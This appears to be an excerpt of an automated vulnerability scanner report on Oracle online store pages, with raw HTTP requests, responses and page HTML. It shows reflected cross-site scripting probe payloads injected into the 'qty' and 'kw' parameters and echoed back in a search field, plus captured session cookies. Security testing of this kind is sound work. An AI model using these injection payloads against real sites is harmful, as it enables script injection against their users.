subobj.startTime=new Date().getTime(); subobj.contentheight=parseInt(subobj.offsetHeight); if (typeof window["hidetimer_"+subobj.id]!="undefined") clearTimeout(window["hidetimer_"+subobj.id]); this.slideengine(subobj, (subobj.dropposition[1]=="top")? "up" : "down"); } } function curveincrement(percent){ return (1-Math.cos(percent*Math.PI)) / 2 ; } function slideengine(obj, direction){ var elapsed=new Date().getTime()-obj.startTime; if (elapsed<obj.glidetime){ var distancepercent=(direction=="down")? this.curveincrement(elapsed/obj.glidetime) : 1-this.curveincrement(elapsed/obj.glidetime); var currentclip=(distancepercent*obj.contentheight)+"px"; obj.style.clip=(direction=="down")? "rect(0 auto "+currentclip+" 0)" : "rect("+currentclip+" auto auto 0)"; window["glidetimer_"+obj.id]=setTimeout(function(){slideengine(obj, direction)}, 10); } else{ obj.style.clip="rect(0 auto auto 0)"; } } function hide(activeobj, subobj, e){ if (!isPopUpExist(activeobj, e)){ window["hidetimer_"+subobj.id]=setTimeout(function(){ subobj.style.visibility="hidden" subobj.style.left=subobj.style.top=0 clearTimeout(window["glidetimer_"+subobj.id]) }, hidedivmouseout[1]) } } function initpopup(anchorid, pos, glidetime, revealbehavior){ var anchorobj=document.getElementById(anchorid); var subobj=document.getElementById(anchorobj.getAttribute('rel')); subobj.dropposition=pos.split("-"); subobj.glidetime=glidetime || 1000; subobj.style.left=subobj.style.top=0; if (typeof revealbehavior=='undefined' || revealbehavior=='mouseover'){ anchorobj.onmouseover=function(e){showSLPopup(this, subobj, e)} anchorobj.onmouseout=function(e){hide(subobj, subobj, e)} if (this.disableanchorlink) anchorobj.onclick=function(){return false} } else anchorobj.onclick=function(e){showSLPopup(this, subobj, e); return false} if (this.hidedivmouseout[0]==true) subobj.onmouseout=function(e){hide(this, subobj, e)} }</script> </HEAD><body class="applicationBody"><!-- ibeCCtdTop.jsp end --><!-- ibeCZzdTop.jsp end --><!-- $Header: ibeCZzdMenu.jsp 120.4 2005/09/16 11:44:37 appldev ship $ -->



























<!-- $Header: ibeCCtdMenu.jsp 120.32.12010000.7 2009/06/02 09:02:13 ukalaiah ship $ --><!-- $Header: ibeCZzpRuntimeIncl.jsp 120.4 2008/01/14 07:12:08 skotikal ship $ --> <!-- ibeCZzpRuntimeIncl.jsp end --><a href="#TheContent"><img src="/OA_MEDIA/jtfutrpx.gif" align=right width=1 height=1 alt="Skip navigation elements to page contents" border="0"></a><table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td class="topBG"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td colspan="2" height="10"><img src="/OA_MEDIA/jtfutrpx.gif" alt="" height="10"></td> </tr> <tr><!--- Commented the hardrcoded logo image bug 6794502 <td width="5%" valign="center"> <img src="/OA_MEDIA/FNDSSCORP.gif" alt="" border="0"/> </td>---><td width='5%' valign='center' ><a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdMinisites.jsp?sitex=10145:1298447:US"><img src="jtfdload.jsp?fileid=455388252&appName=IBE&sitex=10145:1298447:US" ALT="Site Main Logo" border=0 ></a></td> <td width="95%" valign="bottom" class="applicationName"> &nbsp;&nbsp;Finland </td> </tr> <tr> <td colspan="2" align="right"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td nowrap valign="top"> <a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdMinisites.jsp?sitex=10145:1298447:US" class=OraGlobalButtonText> Sites</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="http://oraclestore.oracle.com/OA_HTML/misibeCScdViewA.jsp?sitex=10145:1298447:US" class=OraGlobalButtonText> Cart</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCOtdOrdSumMain.jsp?sitex=10145:1298447:US" class=OraGlobalButtonText> Orders</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCAcpProfMenuHome.jsp?sitex=10145:1298447:US" class=OraGlobalButtonText> Profile</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCAcpSSOLogin.jsp?sitex=10145:1298447:US" class=OraGlobalButtonText> Login</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCAcpSSOReg.jsp?sitex=10145:1298447:US" class=OraGlobalButtonText> Register</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdHelp.jsp?sitex=10145:1298447:US" class=OraGlobalButtonText> Help</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> </tr> </table> </td> </tr> <tr> <td height="1" colspan="2" valign="bottom" align="left"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td width="1"><img src="/OA_HTML/cabo/images/swan/topTabL.gif" alt="" border="0"/></td> <td nowrap class="OraTabBarSelected"> <a class="OraTabBarSelected" target=_parent href="http://oraclestore.oracle.com/OA_HTML/ibeCCtpSctDspRte.jsp?section=10380&sitex=10145:1298447:US">Home</a> </td> <td width="1"><img src="/OA_HTML/cabo/images/swan/topTabR.gif" alt="" border="0"/></td> <td width="1"/> </tr> </table> </td> </tr> <tr> <td align="left" background="/OA_HTML/cabo/images/swan/header-Bg.gif" colspan="2"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="8" height="5" /></td> <td class="OraNav2Selected" nowrap> <a class="OraNav2Selected" target=_parent href="ibeCCtpSctDspRte.jsp?section=10389&sitex=10145:1298447:US">Welcome</a> </td> <td><img src="/OA_HTML/cabo/images/swan/separator.gif" alt ="" border="0"/></td> <td class="OraNav2Enabled" nowrap> <a class="OraNav2Enabled" target=_parent href="ibeCCtpSctDspRte.jsp?section=10381&sitex=10145:1298447:US">How to Order</a> </td> <td><img src="/OA_HTML/cabo/images/swan/separator.gif" alt ="" border="0"/></td> <td class="OraNav2Enabled" nowrap> <a class="OraNav2Enabled" target=_parent href="ibeCCtpSctDspRte.jsp?section=10388&sitex=10145:1298447:US">Trial Software</a> </td> </tr> </table> </td> </tr> </table> </td> </tr></table><form method="get" target=_parent name=searchItemaction="http://oraclestore.oracle.com/OA_HTML/ibeCSrdSrchResults.jsp"><INPUT TYPE=hidden NAME="cg" value=""><INPUT TYPE=hidden NAME="kw" value=""><INPUT TYPE=hidden NAME="ds" value="0"><INPUT TYPE=hidden NAME="dr" value="50"><INPUT TYPE=hidden NAME="st" value="kw"><INPUT TYPE=hidden NAME="cpg" value="0"> <!-- PREFAB_REF=""--></form><script language="JavaScript"><!--function postSearchItem() { var serIt = document.searchItem; var selIndex = document.common.cg.selectedIndex; serIt.cg.value = document.common.cg.options[selIndex].value; serIt.kw.value = document.common.kw.value; serIt.submit();}//--></script><form name=common onSubmit="postSearchItem();return false;"><table summary="" border=0 cellpadding=0 cellspacing=0 width=100%><tbody> <tr class="searchBar"> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="8"/> </td> <td align="left" valign="middle" nowrap height="25"> <table summary="" border="0" cellspacing="0" cellpadding="0"> <tr> <td valign="middle" nowrap class=prompt> Quick Search </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td valign="middle" nowrap> <label for="cg"><span class="jttinvis"> Quick Search&nbsp;&nbsp;</span></label> <select id="cg" name="cg" class="prompt"> <option value=-200 >All Products <option value=10380>Home </select> </td> <td class="prompt" align="right" nowrap> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td valign="middle" nowrap> <label for="query"><span class="jttinvis"> Keyword(s):</span></label> <INPUT id="query" TYPE="text" size="30" NAME="kw" value="'" ns= netsparker(0x0018D0)"> </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td> <script language="JavaScript"> buttonGen("Go","javascript:postSearchItem()"); </script> </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td nowrap> <a href="http://oraclestore.oracle.com/OA_HTML/ibeCSrdSrchAdvForm.jsp?sitex=10145:1298447:US" target=_parent class="searchBarLink"> Advanced Search</a>&nbsp;<a class=searchBarLink target=_parent href="/OA_HTML/ibeCCtpSctDspRte.jsp?section=11365&media=os_g_english_help_search_tool">Help</a> </a> </td> </tr> </table> </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="8"/> </td> </tr></table></form><a id="TheContent" name="TheContent"></a><table class="contentBG" summary="" border=0 cellpadding=0 cellspacing=0 width=100%><tbody><!-- 11/11/2008 amaheshw Bug 7502501 --><tr><td colspan=3><img alt='' height=10 src="/OA_MEDIA/jtfutrpx.gif" width=1></td></tr><tr><td><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=10></td><td width=100%><NOSCRIPT><table summary="" border=0 cellspacing=0 cellpadding=0> <TR> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD class=OraBGAccentDark colSpan=5><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD class=OraBGAccentDark><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=13></TD> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> </TR> <TR> <TD>&nbsp;</TD> <TD class=OraBGAccentDark>&nbsp;</TD> <TD class=OraBGAccentDark> <img alt='' height=32 src="/OA_MEDIA/jtfuwarn.gif" width=32></TD> <TD class=OraBGAccentDark>&nbsp;</TD> <TD class=errorHeader>Error</TD> <TD class=errorMessage><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=20></TD> <TD class=errorMessage width="100%"> <LI>JavaScript is disabled on your browser. JavaScript needs to be turned on for the application to be fully functional. </TD> ..
- /OA_HTML/ibeCCtpBuyRoute.jsp

/OA_HTML/ibeCCtpBuyRoute.jsp

http://oraclestore.oracle.com/OA_HTML/ibeCCtpBuyRoute.jsp

Parameters

Parameter Type Value
item POST 925062
refpage POST misibeCCtdItemDetail.jsp?item=925062&section=87615&section=87615
tmpx POST 100
tmpy POST 100
section POST 87615
event POST 3
shopListName POST null
action POST null
item_type_code POST STD
uom POST EA
qty POST '><net sparker=alert(0x001E9A)>

Request

POST /OA_HTML/ibeCCtpBuyRoute.jsp HTTP/1.1
Referer: http://oraclestore.oracle.com/OA_HTML/ibeCCtpItmDspRte.jsp?item=925062§ion=87615&beginIndex=0&sitex=14405:1435532:US
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: oraclestore.oracle.com
Cookie: JSESSIONID=17c105de297038258bae5b793b096e3f566244ab3e8b9342c881a35cf697840c.e34QbhaLa3mKbi0La3mQaNePax4Le0; GSI_pses=ZG38F3DA2C416BD955B67011AAFA396E72124F64ED2123DF88A91A760601C0436F12B6A6260BCBA10E12CD561EEC5E6B88; BIGipServergsiap_store_http=3540882061.5150.0000; GSI=2jMlOSLxZ6Jq0T8JWcmIxm7RJr
Content-Length: 241
Expect: 100-continue
Accept-Encoding: gzip, deflate

item=925062&refpage=misibeCCtdItemDetail.jsp%3fitem%3d925062%26section%3d87615%26section%3d87615&tmpx=100&tmpy=100§ion=87615&event=3&shopListName=null&action=null&item_type_code=STD&uom=EA&qty='%3e%3cnet+sparker%3dnetsparker(0x001E9A)%3e

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Encoding:
Content-Length: 11301
Set-Cookie: JSESSIONID=17c105de297038258bae5b793b096e3f566244ab3e8b9342c881a35cf697840c.e34Qb38Qax0Obi0La3mQaxaObxuOe0; path=/OA_HTML; secure
Date: Sun, 11 Sep 2011 18:08:07 GMT
Content-Location: https://oraclestore.oracle.com/OA_HTML/misibeCCtdItemDetail.jsp






























<!-- $Header: misibeCCtdItemDetail.jsp 120.0 2006/12/27 06:27:09 dpavani noship $ --><!-- Copy Of ibeCCtdItemDetail.jsp 120.7 --><!-- $Header: ibeCZzpHeader.jsp 120.32.12010000.3 2009/03/03 06:43:46 ukalaiah ship $ --><!-- ibeCZzpHeader.jsp end --><!-- $Header: ibeCCtpSetItem.jsp 120.2 2006/01/17 21:52:05 ssekar noship $ --><!-- $Header: ibeCCtpPostingI.jsp 120.0 2005/05/30 02:51:13 appldev noship $ --> <!-- ibeCCtpPostingI.jsp end --><!-- $Header: ibeCZzdTop.jsp 120.2 2005/07/04 04:26:38 appldev ship $ --> <!-- $Header: ibwTrackingHeader.jsp 120.6 2006/01/22 21:55 schittar noship $ -->















<!-- $Header: ibeCCtdTop.jsp 120.7.12010000.6 2010/04/23 07:18:39 ukalaiah ship $ --><!-- $Header: ibeCZzpRuntimeIncl.jsp 120.4 2008/01/14 07:12:08 skotikal ship $ --> <!-- ibeCZzpRuntimeIncl.jsp end --><HTML lang="EN-US"><HEAD> <TITLE> Site:Product Details </TITLE> <link rel=stylesheet href=ibeCStyleSheet.css> <SCRIPT LANGUAGE="JavaScript" SRC="ibeCButton.js"></script> <script LANGUAGE="javascript"> var disableanchorlink= true; var hidedivmouseout= [true, 200]; var formNameSL="null"; var relatedIndex="null"; function getWinOffset(what, offsettype){ return (what.offsetParent)? what[offsettype]+this.getWinOffset(what.offsetParent, offsettype) : what[offsettype]; } function isPopUpExist(m, e){ var e=window.event || e var c=e.relatedTarget || ((e.type=="mouseover")? e.fromElement : e.toElement) while (c && c!=m)try {c=c.parentNode} catch(e){c=m} if (c==m) return true; else return false; } function showSLPopup(anchorobj, subobj, e){ try{ if(isItemPopupOpen()){ closeItemPopup(); } }catch(ex){} formNameSL = anchorobj.getAttribute("formname"); try{ relatedIndex = anchorobj.getAttribute("relindex"); }catch(ex){} try{ document.getElementById('text_cr_shoplist').value='Create Shopping List'; }catch(ex){} try{ document.getElementById('text_cr_shoplist_details').value='Create Shopping List'; }catch(ex){} if (!this.isPopUpExist(anchorobj, e) || (e && e.type=="click")){ var e=window.event || e; if (e.type=="click" && subobj.style.visibility=="visible"){ subobj.style.visibility="hidden"; return; } var subobjtemp; if(formNameSL == 'relatedForm'){ subobjtemp=document.getElementById('tempoffset_related'); } else { subobjtemp=document.getElementById('tempoffset'); } var horizontaloffset=(subobj.dropposition[0]=="left")? -(subobj.offsetWidth-anchorobj.offsetWidth) : 0; var verticaloffset=(subobj.dropposition[1]=="top")? -subobj.offsetHeight : anchorobj.offsetHeight ; subobj.style.left=this.getWinOffset(subobjtemp, "offsetLeft") + horizontaloffset + "px"; subobj.style.top=this.getWinOffset(anchorobj, "offsetTop")+verticaloffset+"px"; subobj.style.clip=(subobj.dropposition[1]=="top")? "rect(auto auto auto 0)" : "rect(0 auto 0 0)"; subobj.style.visibility="visible"; subobj.startTime=new Date().getTime(); subobj.contentheight=parseInt(subobj.offsetHeight); if (typeof window["hidetimer_"+subobj.id]!="undefined") clearTimeout(window["hidetimer_"+subobj.id]); this.slideengine(subobj, (subobj.dropposition[1]=="top")? "up" : "down"); } } function curveincrement(percent){ return (1-Math.cos(percent*Math.PI)) / 2 ; } function slideengine(obj, direction){ var elapsed=new Date().getTime()-obj.startTime; if (elapsed<obj.glidetime){ var distancepercent=(direction=="down")? this.curveincrement(elapsed/obj.glidetime) : 1-this.curveincrement(elapsed/obj.glidetime); var currentclip=(distancepercent*obj.contentheight)+"px"; obj.style.clip=(direction=="down")? "rect(0 auto "+currentclip+" 0)" : "rect("+currentclip+" auto auto 0)"; window["glidetimer_"+obj.id]=setTimeout(function(){slideengine(obj, direction)}, 10); } else{ obj.style.clip="rect(0 auto auto 0)"; } } function hide(activeobj, subobj, e){ if (!isPopUpExist(activeobj, e)){ window["hidetimer_"+subobj.id]=setTimeout(function(){ subobj.style.visibility="hidden" subobj.style.left=subobj.style.top=0 clearTimeout(window["glidetimer_"+subobj.id]) }, hidedivmouseout[1]) } } function initpopup(anchorid, pos, glidetime, revealbehavior){ var anchorobj=document.getElementById(anchorid); var subobj=document.getElementById(anchorobj.getAttribute('rel')); subobj.dropposition=pos.split("-"); subobj.glidetime=glidetime || 1000; subobj.style.left=subobj.style.top=0; if (typeof revealbehavior=='undefined' || revealbehavior=='mouseover'){ anchorobj.onmouseover=function(e){showSLPopup(this, subobj, e)} anchorobj.onmouseout=function(e){hide(subobj, subobj, e)} if (this.disableanchorlink) anchorobj.onclick=function(){return false} } else anchorobj.onclick=function(e){showSLPopup(this, subobj, e); return false} if (this.hidedivmouseout[0]==true) subobj.onmouseout=function(e){hide(this, subobj, e)} }</script> </HEAD><body class="applicationBody"><!-- ibeCCtdTop.jsp end --><!-- ibeCZzdTop.jsp end --><!-- $Header: ibeCZzdMenu.jsp 120.4 2005/09/16 11:44:37 appldev ship $ -->



























<!-- $Header: ibeCCtdMenu.jsp 120.32.12010000.7 2009/06/02 09:02:13 ukalaiah ship $ --><!-- $Header: ibeCZzpRuntimeIncl.jsp 120.4 2008/01/14 07:12:08 skotikal ship $ --> <!-- ibeCZzpRuntimeIncl.jsp end --><a href="#TheContent"><img src="/OA_MEDIA/jtfutrpx.gif" align=right width=1 height=1 alt="Skip navigation elements to page contents" border="0"></a><table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td class="topBG"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td colspan="2" height="10"><img src="/OA_MEDIA/jtfutrpx.gif" alt="" height="10"></td> </tr> <tr><!--- Commented the hardrcoded logo image bug 6794502 <td width="5%" valign="center"> <img src="/OA_MEDIA/FNDSSCORP.gif" alt="" border="0"/> </td>---><td width='5%' valign='center' ><a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdMinisites.jsp?sitex=14405:1435532:US"><img src="jtfDownload.jsp?fileid=ZG2F58CCDCA96F8D219B9730F01A5E95888E0A6400B1D6CFB7&appName=IBE&sitex=14405:1435532:US" ALT="Site Main Logo" border=0 ></a></td> <td width="95%" valign="bottom" class="applicationName"> &nbsp;&nbsp;Oracle Unbreakable Linux and Oracle VM Store </td> </tr> <tr> <td colspan="2" align="right"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td nowrap valign="top"> <a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdMinisites.jsp?sitex=14405:1435532:US" class=OraGlobalButtonText> Sites</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="http://oraclestore.oracle.com/OA_HTML/misibeCScdViewA_LJE.jsp?sitex=14405:1435532:US" class=OraGlobalButtonText> Cart</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCOtdOrdSumMain.jsp?sitex=14405:1435532:US" class=OraGlobalButtonText> Orders</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCAcpProfMenuHome.jsp?sitex=14405:1435532:US" class=OraGlobalButtonText> Profile</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCAcpSSOLogin.jsp?sitex=14405:1435532:US" class=OraGlobalButtonText> Login</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCAcpSSOReg.jsp?sitex=14405:1435532:US" class=OraGlobalButtonText> Register</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdHelp.jsp?sitex=14405:1435532:US" class=OraGlobalButtonText> Help</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> </tr> </table> </td> </tr> <tr> <td height="1" colspan="2" valign="bottom" align="left"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td width="1"><img src="/OA_HTML/cabo/images/swan/topTabL.gif" alt="" border="0"/></td> <td nowrap class="OraTabBarSelected"> <a class="OraTabBarSelected" target=_parent href="http://oraclestore.oracle.com/OA_HTML/ibeCCtpSctDspRte.jsp?section=87615&sitex=14405:1435532:US">Oracle Unbreakable Linux and Oracle VM Store</a> </td> <td width="1"><img src="/OA_HTML/cabo/images/swan/topTabR.gif" alt="" border="0"/></td> <td width="1"/> </tr> </table> </td> </tr> <tr> <td align="left" background="/OA_HTML/cabo/images/swan/header-Bg.gif" colspan="2"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="8" height="5" /></td> </tr> </table> </td> </tr> </table> </td> </tr></table><form method="get" target=_parent name=searchItemaction="http://oraclestore.oracle.com/OA_HTML/ibeCSrdSrchResults.jsp"><INPUT TYPE=hidden NAME="cg" value=""><INPUT TYPE=hidden NAME="kw" value=""><INPUT TYPE=hidden NAME="ds" value="0"><INPUT TYPE=hidden NAME="dr" value="50"><INPUT TYPE=hidden NAME="st" value="kw"><INPUT TYPE=hidden NAME="cpg" value="0"> <!-- PREFAB_REF=""--></form><script language="JavaScript"><!--function postSearchItem() { var serIt = document.searchItem; var selIndex = document.common.cg.selectedIndex; serIt.cg.value = document.common.cg.options[selIndex].value; serIt.kw.value = document.common.kw.value; serIt.submit();}//--></script><form name=common onSubmit="postSearchItem();return false;"><table summary="" border=0 cellpadding=0 cellspacing=0 width=100%><tbody> <tr class="searchBar"> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="8"/> </td> <td align="left" valign="middle" nowrap height="25"> <table summary="" border="0" cellspacing="0" cellpadding="0"> <tr> <td valign="middle" nowrap class=prompt> Quick Search </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td valign="middle" nowrap> <label for="cg"><span class="jttinvis"> Quick Search&nbsp;&nbsp;</span></label> <select id="cg" name="cg" class="prompt"> <option value=-200 >All Products <option value=-200>All Products </select> </td> <td class="prompt" align="right" nowrap> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td valign="middle" nowrap> <label for="query"><span class="jttinvis"> Keyword(s):</span></label> <INPUT id="query" TYPE="text" size="30" NAME="kw" value=""> </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td> <script language="JavaScript"> buttonGen("Go","javascript:postSearchItem()"); </script> </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td nowrap> <a href="http://oraclestore.oracle.com/OA_HTML/ibeCSrdSrchAdvForm.jsp?sitex=14405:1435532:US" target=_parent class="searchBarLink"> Advanced Search</a>&nbsp;<a class=searchBarLink target=_parent href="/OA_HTML/ibeCCtpSctDspRte.jsp?section=11365&media=os_g_english_help_search_tool">Help</a> </a> </td> </tr> </table> </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="8"/> </td> </tr></table></form><a id="TheContent" name="TheContent"></a><table class="contentBG" summary="" border=0 cellpadding=0 cellspacing=0 width=100%><tbody><!-- 11/11/2008 amaheshw Bug 7502501 --><tr><td colspan=3><img alt='' height=10 src="/OA_MEDIA/jtfutrpx.gif" width=1></td></tr><tr><td><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=10></td><td width=100%><NOSCRIPT><table summary="" border=0 cellspacing=0 cellpadding=0> <TR> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD class=OraBGAccentDark colSpan=5><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD class=OraBGAccentDark><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=13></TD> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> </TR> <TR> <TD>&nbsp;</TD> <TD class=OraBGAccentDark>&nbsp;</TD> <TD class=OraBGAccentDark> <img alt='' height=32 src="/OA_MEDIA/jtfuwarn.gif" width=32></TD> <TD class=OraBGAccentDark>&nbsp;</TD> <TD class=errorHeader>Error</TD> <TD class=errorMessage><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=20></TD> <TD class=errorMessage width="100%"> <LI>JavaScript is disabled on your browser. JavaScript needs to be turned on for the application to be fully functional. </TD> <TD class=OraBGAccentDark>&nbsp;</TD> <TD>&nbsp;</TD> </TR> <TR> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD class=OraBGAccentDark colSpan=7><img alt='' height=10 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> </TR></table></NOSCRIPT>










<!-- $Header: ibeCAcdProfMenuTop.jsp 120.0 2005/05/30 03:20:10 appldev noship $ --><!-- $Header: ibeCZzpRuntimeIncl.jsp 120.4 2008/01/14 07:12:08 skotikal ship $ --> <!-- ibeCZzpRuntimeIncl.jsp end --><!-- ibeCCtdMenu.jsp end --><!-- ibeCZzdMenu.jsp end --><!-- body section ------------------------------------------------------------><table summary='' border="0" width="100%"> <table summary='' cellSpacing=0 cellPadding=0 width="100%" border=0> <TBODY> <TR> <!-- left column --------------------------------------------------------> <TD vAlign=top width="15%"> ..
- /OA_HTML/ibeCCtpItmDspRte.jsp

/OA_HTML/ibeCCtpItmDspRte.jsp

http://oraclestore.oracle.com/OA_HTML/ibeCCtpItmDspRte.jsp?item=925062&section=87615&beginIndex=0&si..

Parameters

Parameter Type Value
item GET 925062
section GET 87615
beginIndex GET 0
sitex GET 14405:1435532:US
cg GET -200
kw GET "><net sparker=alert(0x002086)>

Request

GET /OA_HTML/ibeCCtpItmDspRte.jsp?item=925062§ion=87615&beginIndex=0&sitex=14405:1435532:US&cg=-200&kw=%22%3E%3Cnet%20sparker=netsparker(0x002086)%3E HTTP/1.1
Referer: http://oraclestore.oracle.com/OA_HTML/ibeCCtpItmDspRte.jsp?item=925062§ion=87615&beginIndex=0&sitex=14405:1435532:US
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: oraclestore.oracle.com
Cookie: JSESSIONID=4d59553018b9a173cb023fbe1bb776e31f3dc52c2bdddda94a702daab3e85aa2.e34QbhaLa3mKbi0La3mQaNePax4Le0; GSI_pses=ZGB8694A1CACCA04BDFCFD4D9B70D3A05EA2C0EECC9C8E780D7082AA5A31609F48A4EA02CD071B2336BDC010B5984DDCF6; BIGipServergsiap_store_http=3540882061.5150.0000; GSI=JFWp6ALUuGKvgqnyV2zBOJJFVf
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Encoding:
Set-Cookie: JSESSIONID=4d59553018b9a173cb023fbe1bb776e31f3dc52c2bdddda94a702daab3e85aa2.e34Qb38Qax0Obi0La3mQaxaObxuNe0; path=/OA_HTML; secure
Content-Length: 10288
Date: Sun, 11 Sep 2011 18:09:01 GMT
Content-Location: https://oraclestore.oracle.com/OA_HTML/misibeCCtdItemDetail.jsp






























<!-- $Header: misibeCCtdItemDetail.jsp 120.0 2006/12/27 06:27:09 dpavani noship $ --><!-- Copy Of ibeCCtdItemDetail.jsp 120.7 --><!-- $Header: ibeCZzpHeader.jsp 120.32.12010000.3 2009/03/03 06:43:46 ukalaiah ship $ --><!-- ibeCZzpHeader.jsp end --><!-- $Header: ibeCCtpSetItem.jsp 120.2 2006/01/17 21:52:05 ssekar noship $ --><!-- $Header: ibeCCtpPostingI.jsp 120.0 2005/05/30 02:51:13 appldev noship $ --> <!-- ibeCCtpPostingI.jsp end --><!-- $Header: ibeCZzdTop.jsp 120.2 2005/07/04 04:26:38 appldev ship $ --> <!-- $Header: ibwTrackingHeader.jsp 120.6 2006/01/22 21:55 schittar noship $ -->















<!-- $Header: ibeCCtdTop.jsp 120.7.12010000.6 2010/04/23 07:18:39 ukalaiah ship $ --><!-- $Header: ibeCZzpRuntimeIncl.jsp 120.4 2008/01/14 07:12:08 skotikal ship $ --> <!-- ibeCZzpRuntimeIncl.jsp end --><HTML lang="EN-US"><HEAD> <TITLE> Site:Product Details </TITLE> <link rel=stylesheet href=ibeCStyleSheet.css> <SCRIPT LANGUAGE="JavaScript" SRC="ibeCButton.js"></script> <script LANGUAGE="javascript"> var disableanchorlink= true; var hidedivmouseout= [true, 200]; var formNameSL="null"; var relatedIndex="null"; function getWinOffset(what, offsettype){ return (what.offsetParent)? what[offsettype]+this.getWinOffset(what.offsetParent, offsettype) : what[offsettype]; } function isPopUpExist(m, e){ var e=window.event || e var c=e.relatedTarget || ((e.type=="mouseover")? e.fromElement : e.toElement) while (c && c!=m)try {c=c.parentNode} catch(e){c=m} if (c==m) return true; else return false; } function showSLPopup(anchorobj, subobj, e){ try{ if(isItemPopupOpen()){ closeItemPopup(); } }catch(ex){} formNameSL = 